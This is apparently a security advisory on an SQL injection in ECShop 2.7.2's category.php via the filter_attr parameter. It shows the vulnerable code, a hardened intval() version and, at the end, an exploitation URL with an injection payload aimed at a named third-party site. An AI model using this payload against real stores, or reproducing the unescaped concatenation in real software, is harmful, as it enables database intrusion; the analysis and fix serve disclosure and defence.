ECShop mall system: SQL injection vulnerability in the category page caused by poor filtering
Affected Versions:
ECShop V2.7.2 UTF8_Release0505
Vulnerability analysis: file category.php

// line 52
$filter_attr_str = isset($_REQUEST['filter_attr']) ? trim($_REQUEST['filter_attr']) : '0';
$filter_attr = empty($filter_attr_str) ? '' : explode('.', trim($filter_attr_str));

$filter_attr is $filter_attr_str split on '.' into an array; each element still comes straight from the request, unchecked.

// line 308
/* Extended attribute query conditions */
if (!empty($filter_attr))
{
    $ext_sql = "SELECT DISTINCT(b.goods_id) FROM " . $ecs->table('goods_attr') . " AS a, " . $ecs->table('goods_attr') . " AS b " . "WHERE ";
    $ext_group_goods = array();
    foreach ($filter_attr AS $k => $v) // locate the goods ids that satisfy all filter attributes
    {
        if ($v != 0)
        {
            $sql = $ext_sql . "b.attr_value = a.attr_value AND b.attr_id = " . $cat_filter_attr[$k] . " AND a.goods_attr_id = " . $v;
            $ext_group_goods = $db->getColCached($sql);
            $ext .= ' AND ' . db_create_in($ext_group_goods, 'g.goods_id');
        }
    }
}

$v is concatenated into the SQL statement without any processing, so an attacker-controlled filter_attr segment reaches the database unescaped: SQL injection.
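The following is an added example, not ECShop's own code: the filter loop from category.php rebuilt as two functions, the raw concatenation that is vulnerable and a hardened version that casts every filter_attr segment and attribute id to an integer before it touches the query. The $cat_filter_attr values and the payload are constructed stand-ins.

```php
<?php
// Added example (not ECShop's code). Both attr_id and goods_attr_id are
// integer columns, so intval() is the complete fix for this injection.

function parse_filter_attr(string $raw): array
{
    // Same split as category.php line 52: "12.0.34" -> ["12", "0", "34"]
    $raw = trim($raw);
    return $raw === '' ? [] : explode('.', $raw);
}

// Vulnerable form, kept only for comparison: $v is concatenated raw.
function build_ext_sql_vulnerable(array $filter_attr, array $cat_filter_attr): array
{
    $out = [];
    foreach ($filter_attr as $k => $v) {
        if ($v != 0) {
            $out[] = "b.attr_value = a.attr_value AND b.attr_id = " . $cat_filter_attr[$k]
                   . " AND a.goods_attr_id = " . $v;
        }
    }
    return $out;
}

// Hardened form: cast first, then keep only positive ids. A segment such as
// "-999 or 1=1 ..." becomes -999 and is dropped, just like the "0" placeholder.
function build_ext_sql_safe(array $filter_attr, array $cat_filter_attr): array
{
    $out = [];
    foreach ($filter_attr as $k => $v) {
        $v = intval($v);
        $attr_id = intval($cat_filter_attr[$k] ?? 0); // assumed: ids per position
        if ($v > 0 && $attr_id > 0) {
            $out[] = "b.attr_value = a.attr_value AND b.attr_id = $attr_id"
                   . " AND a.goods_attr_id = $v";
        }
    }
    return $out;
}

// Constructed inputs in the shape of the reported request.
$payload = '-999 or 1=1 and exists (select * from admin)';
$cat_filter_attr = [17];
var_dump(build_ext_sql_vulnerable(parse_filter_attr($payload), $cat_filter_attr));
// the payload lands verbatim inside the WHERE clause
var_dump(build_ext_sql_safe(parse_filter_attr($payload), $cat_filter_attr));
// empty array: the segment never reaches the database
var_dump(build_ext_sql_safe(parse_filter_attr('12.0.34'), [17, 18, 19]));
// two legitimate conditions, ids 12 and 34
```

The same intval() cast belongs on $cat_filter_attr itself if that array is ever built from request data rather than from the category record.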
Vulnerability exploitation:
http://www.xiaoweio.cn/shop/category.php?page=1&sort=goods_id&order=ASC%23goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999 or 1=1 and exists (select * from admin)
From the red/Black Alliance